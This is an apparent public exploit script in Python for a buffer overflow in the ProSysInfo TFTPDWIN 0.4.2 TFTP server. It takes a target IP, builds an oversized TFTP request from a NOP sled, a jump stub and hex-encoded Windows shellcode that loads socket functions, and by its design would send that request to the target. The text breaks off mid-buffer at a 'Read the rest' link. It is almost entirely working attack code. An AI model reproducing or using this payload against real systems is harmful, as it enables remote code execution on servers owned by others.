#!/usr/bin/python

#ProSysInfo TFTP Server TFTPDWIN 0.4.2
#Coded by Wraith

import os
import sys
import struct
import socket
import time

print "\nProSysInfo TFTP Server TFTPDWIN 0.4.2"
print "Note: This vuln is sensitive to different buffer length\n"
if len(sys.argv)!=2:
        print "Usage: tftpdwin.py <ip>"
        sys.exit(0)

buffer = "\x00\x01\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
buffer += "\x8b\xc3\x66\x05\x12\x01\x50\xc3" + "\x90"*57

buffer += "\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64"
buffer += "\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C"
buffer += "\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77"
buffer += "\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60"
buffer += "\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF"
buffer += "\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7"
buffer += "\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B"
buffer… Read the rest